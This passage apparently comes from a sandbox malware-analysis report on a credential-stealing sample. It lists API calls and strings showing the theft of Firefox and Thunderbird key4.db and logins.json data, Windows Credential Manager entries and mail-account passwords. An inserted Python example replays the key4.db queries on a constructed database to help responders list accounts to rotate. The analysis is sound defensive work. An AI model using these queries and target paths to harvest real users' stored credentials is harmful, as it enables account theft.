                    • GetDlgItem.USER32(?,000003EE), ref: 00401186
                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                    • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                    • SetBkMode.GDI32(?,00000001), ref: 004011B9
                    • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                    • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                    • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                    • EndDialog.USER32(?,00000001), ref: 0040121A
                    • DeleteObject.GDI32(?), ref: 00401226
                    • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                    • ShowWindow.USER32(00000000), ref: 00401253
                    • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                    • ShowWindow.USER32(00000000), ref: 00401262
                    • SetDlgItemTextA.USER32(?,000003EE,0045A5E0), ref: 00401273
                    • memset.MSVCRT ref: 0040128E
                    • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                    • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                    • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                    • String ID:
                    • API String ID: 2998058495-0
                    • Opcode ID: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
                    • Instruction ID: d99c78195822e95bfb56004c40aa855916ae81609c5fc0371f4bc40fa141afdc
                    • Opcode Fuzzy Hash: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
                    • Instruction Fuzzy Hash: 2661AA35800248EBDF12AFA0DD85BAE7FA5BB05304F1881B6F904BA2F1C7B59D50DB58
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcmp$memcpy
                    • String ID: %s mode not allowed: %s$,nE$@$BINARY$G+D$G+D$access$cache$file:$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s$vfs
                    • API String ID: 231171946-2189169393
                    • Opcode ID: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                    • Instruction ID: 1e7ca99fc42d5c672073ce6a9752caade8d3c68442cd6653d693641e17a54130
                    • Opcode Fuzzy Hash: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                    • Instruction Fuzzy Hash: 30D13671904245ABFF248F68CA407EEBBB1AF15305F54406FF844A7341D3F89A86CB99
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: _mbscat$memsetsprintf$_mbscpy
                    • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                    • API String ID: 633282248-1996832678
                    • Opcode ID: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
                    • Instruction ID: de3fd18750e25ac655c57e1f527e3f4ad82db586d7f8767584d5c6c21a88759b
                    • Opcode Fuzzy Hash: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
                    • Instruction Fuzzy Hash: 0C31A9B28056557AFB20EB559C42FDAB3ACDF14315F10419FF21462182EA7CAEC4865D
                    APIs
                    Strings
                    • key4.db, xrefs: 00406756
                    • SELECT item1,item2 FROM metadata WHERE id = 'password', xrefs: 004067C4
                    • , xrefs: 00406834
                    • SELECT a11,a102 FROM nssPrivate, xrefs: 00406933
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpy$memcmp$memsetstrlen
                    • String ID: $SELECT a11,a102 FROM nssPrivate$SELECT item1,item2 FROM metadata WHERE id = 'password'$key4.db
                    • API String ID: 3614188050-3983245814
                    • Opcode ID: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                    • Instruction ID: f64da88478914857a13bd548ab7de8656dcb141f17a11f318e4dfa38f1e39988
                    • Opcode Fuzzy Hash: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                    • Instruction Fuzzy Hash: 76A1C7B1A00215ABDB14EFA5D841BDFB3A8FF44308F11453BF515E7282E778EA548B98
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: sprintf$memset$_mbscpy
                    • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                    • API String ID: 3402215030-3842416460
                    • Opcode ID: a1375856f58305cbc92444a301f89f903b2e6d760937f4398232927644d79174
                    • Instruction ID: f20d4583fe87a1bfbd8f178ed5e4bb51106c12545e3cf4f5d6ab8081ed6cb500
                    • Opcode Fuzzy Hash: a1375856f58305cbc92444a301f89f903b2e6d760937f4398232927644d79174
                    • Instruction Fuzzy Hash: 2E4152B2C0115D6AEB21EB54DC42FEA776CEF54308F0401E7B619E2152E278AB988B65
                    APIs
                      • Part of subcall function 00407B29: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040F0E7,?,?,?,?), ref: 00407B42
                      • Part of subcall function 00407B29: CloseHandle.KERNEL32(00000000,?,?,?), ref: 00407B6E
                      • Part of subcall function 004080D4: ??3@YAXPAX@Z.MSVCRT ref: 004080DB
                      • Part of subcall function 00407035: _mbscpy.MSVCRT ref: 0040703A
                      • Part of subcall function 00407035: strrchr.MSVCRT ref: 00407042
                      • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAE3
                      • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAF7
                      • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DB0B
                      • Part of subcall function 0040DAC2: memcpy.MSVCRT ref: 0040DBD8
                      • Part of subcall function 0040DAC2: memcpy.MSVCRT ref: 0040DC38
                      • Part of subcall function 0040F036: _mbsicmp.MSVCRT ref: 0040F07F
                    • strlen.MSVCRT ref: 0040F139
                    • strlen.MSVCRT ref: 0040F147
                    • memset.MSVCRT ref: 0040F187
                    • strlen.MSVCRT ref: 0040F196
                    • strlen.MSVCRT ref: 0040F1A4
                    • memset.MSVCRT ref: 0040F1EA
                    • strlen.MSVCRT ref: 0040F1F9
                    • strlen.MSVCRT ref: 0040F207
                    • _strcmpi.MSVCRT ref: 0040F2B2
                    • _mbscpy.MSVCRT ref: 0040F2CD
                    • _mbscpy.MSVCRT ref: 0040F30E
                      • Part of subcall function 004070E3: _mbscpy.MSVCRT ref: 004070EB
                      • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: strlen$memset$_mbscpy$memcpy$??3@CloseFileHandleSize_mbscat_mbsicmp_strcmpistrrchr
                    • String ID: logins.json$none$signons.sqlite$signons.txt
                    • API String ID: 1613542760-3138536805
                    • Opcode ID: ee10521dd79ee73122fc0f876785dd9113831bb39c60f606fe2404f3e43330c8
                    • Instruction ID: 4390ea688f3eb6ff8deec26b973fceccf030c6f24aada76a9830730871e88cce
                    • Opcode Fuzzy Hash: ee10521dd79ee73122fc0f876785dd9113831bb39c60f606fe2404f3e43330c8
                    • Instruction Fuzzy Hash: 5261F671504605AED724EB70CC81BDAB3E8AF14314F1405BFE599E30C1EB78BA89CB99
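The two entries above show the Firefox/Thunderbird password-store reads: one function runs the two SQL statements against key4.db, the other walks logins.json, signons.sqlite and signons.txt. The Python below is an added example, not code from the Joe Sandbox report or from the sample. It runs the two statements exactly as quoted in the report against a constructed in-memory stand-in for key4.db (only the columns the queries touch, placeholder BLOBs), and then lists from a constructed logins.json which accounts a responder must rotate without decrypting anything. Table layout, placeholder values and the logins.json content are assumptions made for the example.

```python
import json
import sqlite3
from datetime import datetime, timezone

# The two statements below are the ones the report shows the payload issuing
# against key4.db: the 'password' metadata row (global salt plus the
# password-check blob) and the encrypted private-key rows from nssPrivate.
KEY4_PASSWORD_CHECK = "SELECT item1,item2 FROM metadata WHERE id = 'password'"
KEY4_PRIVATE_KEYS = "SELECT a11,a102 FROM nssPrivate"


def build_constructed_key4(conn: sqlite3.Connection) -> None:
    """Fill an in-memory stand-in for key4.db. Only the columns the two queries
    touch are created, and the BLOBs are placeholders, not real NSS data."""
    conn.execute("CREATE TABLE metadata (id TEXT PRIMARY KEY, item1 BLOB, item2 BLOB)")
    conn.execute("CREATE TABLE nssPrivate (id TEXT PRIMARY KEY, a11 BLOB, a102 BLOB)")
    conn.execute("INSERT INTO metadata VALUES (?, ?, ?)",
                 ("password", b"\x11" * 20, b"\x30\x00PLACEHOLDER-DER"))
    conn.execute("INSERT INTO nssPrivate VALUES (?, ?, ?)",
                 ("1", b"\x30\x00PLACEHOLDER-KEY", b"\xf8" + b"\x00" * 14 + b"\x01"))
    conn.commit()


def key4_material(conn: sqlite3.Connection):
    """Run the report's two queries and summarise what they hand back:
    (global_salt_len, password_check_len, [(encrypted_key_len, cka_id_hex), ...])."""
    salt, check = conn.execute(KEY4_PASSWORD_CHECK).fetchone()
    keys = [(len(a11), a102.hex()) for a11, a102 in conn.execute(KEY4_PRIVATE_KEYS)]
    return len(salt), len(check), keys


def demo_key4():
    """Build the constructed database and return what the two queries yield."""
    conn = sqlite3.connect(":memory:")
    build_constructed_key4(conn)
    try:
        return key4_material(conn)
    finally:
        conn.close()


# Constructed logins.json in the layout Firefox writes (version 3). The
# encrypted fields are truncated placeholders.
LOGINS_JSON = json.dumps({
    "nextId": 3,
    "logins": [
        {"id": 1, "hostname": "https://mail.example.test", "httpRealm": None,
         "formSubmitURL": "https://mail.example.test", "usernameField": "user",
         "passwordField": "pass", "encryptedUsername": "MDIE...", "encryptedPassword": "MDoE...",
         "guid": "{00000000-0000-0000-0000-000000000001}", "encType": 1,
         "timeCreated": 1719700000000, "timeLastUsed": 1719800000000,
         "timePasswordChanged": 1719700000000, "timesUsed": 4},
        {"id": 2, "hostname": "https://vpn.example.test", "httpRealm": "Corp VPN",
         "formSubmitURL": None, "usernameField": "", "passwordField": "",
         "encryptedUsername": "MDIE...", "encryptedPassword": "MDoE...",
         "guid": "{00000000-0000-0000-0000-000000000002}", "encType": 1,
         "timeCreated": 1719600000000, "timeLastUsed": 1719700000000,
         "timePasswordChanged": 1719600000000, "timesUsed": 1},
    ],
    "version": 3,
})


def exposed_accounts(logins_json_text: str) -> list[dict]:
    """List the accounts to rotate once logins.json and key4.db have been read.
    Hostname, realm and usage times are stored in the clear, so the responder
    gets the rotation list without decrypting anything."""
    rows = []
    for entry in json.loads(logins_json_text)["logins"]:
        last_used = datetime.fromtimestamp(entry["timeLastUsed"] / 1000, tz=timezone.utc)
        rows.append({
            "hostname": entry["hostname"],
            "realm": entry.get("httpRealm") or entry.get("formSubmitURL") or "",
            "encType": entry.get("encType"),
            "last_used": last_used.date().isoformat(),
        })
    return rows


if __name__ == "__main__":
    print("key4.db material:", demo_key4())
    for row in exposed_accounts(LOGINS_JSON):
        print(f"rotate {row['hostname']} ({row['realm']}), last used {row['last_used']}")
```

Point the `exposed_accounts` call at the real `logins.json` of an affected profile to get the rotation list; the key4.db half only shows what the stealer takes away (salt, password-check blob and the encrypted key rows), which is enough for it to attempt offline decryption, so treat every login in the profile as exposed regardless of whether recovery succeeded.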
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
                    • String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos
                    • API String ID: 1012775001-1343505058
                    • Opcode ID: 67e53a8000507b2df1606981ac9655a9ff446d7e1ebb268b9dca7550b5d4ed50
                    • Instruction ID: 781a2e52d7f362fd39b5c74be6276a003a473a920a8a4abf0813dd90f66971c0
                    • Opcode Fuzzy Hash: 67e53a8000507b2df1606981ac9655a9ff446d7e1ebb268b9dca7550b5d4ed50
                    • Instruction Fuzzy Hash: F2417E72A01128AFEB21DB54CC85FDAB7BCEB4A300F5440EAF54DA7151DA34AA84CF65
                    APIs
                    • memset.MSVCRT ref: 00444612
                      • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                    • strlen.MSVCRT ref: 0044462E
                    • memset.MSVCRT ref: 00444668
                    • memset.MSVCRT ref: 0044467C
                    • memset.MSVCRT ref: 00444690
                    • memset.MSVCRT ref: 004446B6
                      • Part of subcall function 0040D205: memcpy.MSVCRT ref: 0040D296
                      • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                      • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                      • Part of subcall function 0040D2A3: memcpy.MSVCRT ref: 0040D30F
                      • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                    • memcpy.MSVCRT ref: 004446ED
                      • Part of subcall function 0040D205: memcpy.MSVCRT ref: 0040D248
                      • Part of subcall function 0040D205: memcpy.MSVCRT ref: 0040D272
                      • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                    • memcpy.MSVCRT ref: 00444729
                    • memcpy.MSVCRT ref: 0044473B
                    • _mbscpy.MSVCRT ref: 00444812
                    • memcpy.MSVCRT ref: 00444843
                    • memcpy.MSVCRT ref: 00444855
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpymemset$strlen$_mbscpy
                    • String ID: salu
                    • API String ID: 3691931180-4177317985
                    • Opcode ID: 7aa0c36a908e154e1738134483ef229f790a3b7337559f89648c7b5d4c93b75e
                    • Instruction ID: b87b4f34a2d3e3c1159852785770864cc269bb22f3616182f1b5584d27518a2a
                    • Opcode Fuzzy Hash: 7aa0c36a908e154e1738134483ef229f790a3b7337559f89648c7b5d4c93b75e
                    • Instruction Fuzzy Hash: 65713D7190015DAADB10EBA5CC81ADEB7B8FF44348F1444BAF648E7141DB38AB498F95
                    APIs
                    • LoadLibraryA.KERNEL32(psapi.dll,?,0040FE19), ref: 00410047
                    • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 00410060
                    • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00410071
                    • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00410082
                    • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00410093
                    • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004100A4
                    • FreeLibrary.KERNEL32(00000000), ref: 004100C4
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: AddressProc$Library$FreeLoad
                    • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                    • API String ID: 2449869053-232097475
                    • Opcode ID: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                    • Instruction ID: dd2e46225b8bbf3860c07ad768741e6abff990e6b314fd3472572f6830733abf
                    • Opcode Fuzzy Hash: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                    • Instruction Fuzzy Hash: 6E0144399017426AE7226B29BC51B6B3EB89B4DB01B15007BE400E2352DBFCD8C0CF5E
                    APIs
                    • sprintf.MSVCRT ref: 0040957B
                    • LoadMenuA.USER32(?,?), ref: 00409589
                      • Part of subcall function 004093B2: GetMenuItemCount.USER32(?), ref: 004093C7
                      • Part of subcall function 004093B2: memset.MSVCRT ref: 004093E8
                      • Part of subcall function 004093B2: GetMenuItemInfoA.USER32 ref: 00409423
                      • Part of subcall function 004093B2: strchr.MSVCRT ref: 0040943A
                    • DestroyMenu.USER32(00000000), ref: 004095A7
                    • sprintf.MSVCRT ref: 004095EB
                    • CreateDialogParamA.USER32(?,00000000,00000000,00409555,00000000), ref: 00409600
                    • memset.MSVCRT ref: 0040961C
                    • GetWindowTextA.USER32(00000000,?,00001000), ref: 0040962D
                    • EnumChildWindows.USER32(00000000,Function_000094A2,00000000), ref: 00409655
                    • DestroyWindow.USER32(00000000), ref: 0040965C
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                    • String ID: caption$dialog_%d$menu_%d
                    • API String ID: 3259144588-3822380221
                    • Opcode ID: 12c6f4339fc5c8bf88ab30013b8ff134b6349a0731f33ab17c19a0bdce29f0c3
                    • Instruction ID: e9c2f3b5cfdd7c6c8f350bf48a14ef17ef5fca4d90bdc7cc97d58e5e48f5f72a
                    • Opcode Fuzzy Hash: 12c6f4339fc5c8bf88ab30013b8ff134b6349a0731f33ab17c19a0bdce29f0c3
                    • Instruction Fuzzy Hash: 5C212672901288BFDB129F509C81EAF3768FB09305F044076FA01A1192E7B99D548B6E
                    APIs
                      • Part of subcall function 00404656: FreeLibrary.KERNEL32(?,004045E3,?,0040F708,?,00000000), ref: 0040465D
                    • LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                    • GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                    • GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                    • GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                    • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                    • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: AddressProc$Library$FreeLoad
                    • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                    • API String ID: 2449869053-4258758744
                    • Opcode ID: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                    • Instruction ID: 2cc24b9197253aa622afa6144fd2e07652f81762edb29d5cb7a2b3ace442d85c
                    • Opcode Fuzzy Hash: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                    • Instruction Fuzzy Hash: 12014FB49017009ADB30AF75C809B46BBE0EFA9704F214C2FE295A3691E77ED445CF88
                    APIs
                    • RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,00456E58,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
                    • memset.MSVCRT ref: 0040F84A
                    • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 0040F877
                    • RegQueryValueExA.ADVAPI32(?,ps:password,00000000,?), ref: 0040F8A0
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,000000FF,00000000,00000000), ref: 0040F919
                    • LocalFree.KERNEL32(?), ref: 0040F92C
                    • RegCloseKey.ADVAPI32(?), ref: 0040F937
                    • RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                    • RegCloseKey.ADVAPI32(?), ref: 0040F95F
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: CloseOpen$ByteCharEnumFreeLocalMultiQueryValueWidememset
                    • String ID: Creds$ps:password
                    • API String ID: 551151806-1872227768
                    • Opcode ID: 402bd8f731a67ceae123d72f61a5f8da3e135295bef40cbb490a0d19221e27d4
                    • Instruction ID: 67353d5813bb88842fab764933eebe3fab3d63e3b23d31051d6557c10b379f88
                    • Opcode Fuzzy Hash: 402bd8f731a67ceae123d72f61a5f8da3e135295bef40cbb490a0d19221e27d4
                    • Instruction Fuzzy Hash: 71412BB6901209AFDB61DF95DC84EEFBBBCEB48715F0000B6F905E2150DA349A54CF64
                    APIs
                    • wcsstr.MSVCRT ref: 0040426A
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042B1
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042C5
                    • _mbscpy.MSVCRT ref: 004042D5
                    • _mbscpy.MSVCRT ref: 004042E8
                    • strchr.MSVCRT ref: 004042F6
                    • strlen.MSVCRT ref: 0040430A
                    • sprintf.MSVCRT ref: 0040432B
                    • strchr.MSVCRT ref: 0040433C
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: ByteCharMultiWide_mbscpystrchr$sprintfstrlenwcsstr
                    • String ID: %s@gmail.com$www.google.com
                    • API String ID: 3866421160-4070641962
                    • Opcode ID: 29547c4834dfc2f3f2c875d949c5bc687f91e1fab8962d8e257cc58e07cba8ed
                    • Instruction ID: 1d125d0bf78842d5973e64574db62130ec83037e0b154f7c504db0db8660d96c
                    • Opcode Fuzzy Hash: 29547c4834dfc2f3f2c875d949c5bc687f91e1fab8962d8e257cc58e07cba8ed
                    • Instruction Fuzzy Hash: DA3186B290025DAFEB11DBA1DC81FDAB3BCEB45714F1405A7B718E3180DA38EF448A58
                    APIs
                    • _mbscpy.MSVCRT ref: 00409749
                    • _mbscpy.MSVCRT ref: 00409759
                      • Part of subcall function 0040930C: memset.MSVCRT ref: 00409331
                      • Part of subcall function 0040930C: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,?,00001000,0045A448), ref: 00409355
                      • Part of subcall function 0040930C: WritePrivateProfileStringA.KERNEL32(0045A550,?,?,0045A448), ref: 0040936C
                    • EnumResourceNamesA.KERNEL32(?,00000004,Function_0000955A,00000000), ref: 0040978F
                    • EnumResourceNamesA.KERNEL32(?,00000005,Function_0000955A,00000000), ref: 00409799
                    • _mbscpy.MSVCRT ref: 004097A1
                    • memset.MSVCRT ref: 004097BD
                    • LoadStringA.USER32(?,00000000,?,00001000), ref: 004097D1
                      • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: String_mbscpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
                    • String ID: TranslatorName$TranslatorURL$general$strings
                    • API String ID: 1035899707-3647959541
                    • Opcode ID: 07fb82029a378e95c81cd618e89f57cfeb9c17a135c2b190ac6c60c85071189e
                    • Instruction ID: 9d87356d66cebc64c7ffc1a8588b7925a858c7ffbf95e02bf5fcf8d8eff5f455
                    • Opcode Fuzzy Hash: 07fb82029a378e95c81cd618e89f57cfeb9c17a135c2b190ac6c60c85071189e
                    • Instruction Fuzzy Hash: F711C87290016475F7312B569C46F9B3F5CDBCAB55F10007BBB08A71C3D6B89D408AAD
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: _strcmpi_strnicmpmemsetsprintf$strlen
                    • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                    • API String ID: 2360744853-2229823034
                    • Opcode ID: fa9f5f1c2ef6f652c20f964ce99d96b8fee6feb6c02ab87e42e45cad748783be
                    • Instruction ID: 1258fd73e7f0479363a75d8e9bd03f7624e4807d7768342ee5bbbb65847b95d7
                    • Opcode Fuzzy Hash: fa9f5f1c2ef6f652c20f964ce99d96b8fee6feb6c02ab87e42e45cad748783be
                    • Instruction Fuzzy Hash: 95418272604605AFE720DAA6CC81F96B3F8EB04314F14497BF95AE7281D738F9548B58
                    APIs
                    • strchr.MSVCRT ref: 004100E4
                    • _mbscpy.MSVCRT ref: 004100F2
                      • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                      • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                      • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                    • _mbscpy.MSVCRT ref: 00410142
                    • _mbscat.MSVCRT ref: 0041014D
                    • memset.MSVCRT ref: 00410129
                      • Part of subcall function 0040715B: GetWindowsDirectoryA.KERNEL32(0045AA00,00000104,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407170
                      • Part of subcall function 0040715B: _mbscpy.MSVCRT ref: 00407180
                    • memset.MSVCRT ref: 00410171
                    • memcpy.MSVCRT ref: 0041018C
                    • _mbscat.MSVCRT ref: 00410197
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                    • String ID: \systemroot
                    • API String ID: 912701516-1821301763
                    • Opcode ID: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
                    • Instruction ID: fda7f57b1b0f7358cef9bf297f3eeb801234e423e358f1bd4862c9dba8460d26
                    • Opcode Fuzzy Hash: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
                    • Instruction Fuzzy Hash: 3721AA7590C28479F724E2618C83FEA679CDB55704F50405FB2C9A51C1EAECF9C5862A
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpy$strlen
                    • String ID: -journal$-wal$immutable$nolock
                    • API String ID: 2619041689-3408036318
                    • Opcode ID: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                    • Instruction ID: 25f2131b2e7268d2841c48c11c9a86e68458d3caa4be6fdea11427aceae17f40
                    • Opcode Fuzzy Hash: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                    • Instruction Fuzzy Hash: 9FC1D1B1A04606EFDB14DFA5C841BDEFBB0BF45314F14815EE528A7381D778AA90CB98
                    APIs
                      • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                    • wcslen.MSVCRT ref: 0040874A
                    • _wcsncoll.MSVCRT ref: 00408794
                    • memset.MSVCRT ref: 0040882A
                    • memcpy.MSVCRT ref: 00408849
                    • wcschr.MSVCRT ref: 0040889F
                    • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 004088CB
                    Strings
                    Memory Dump Source
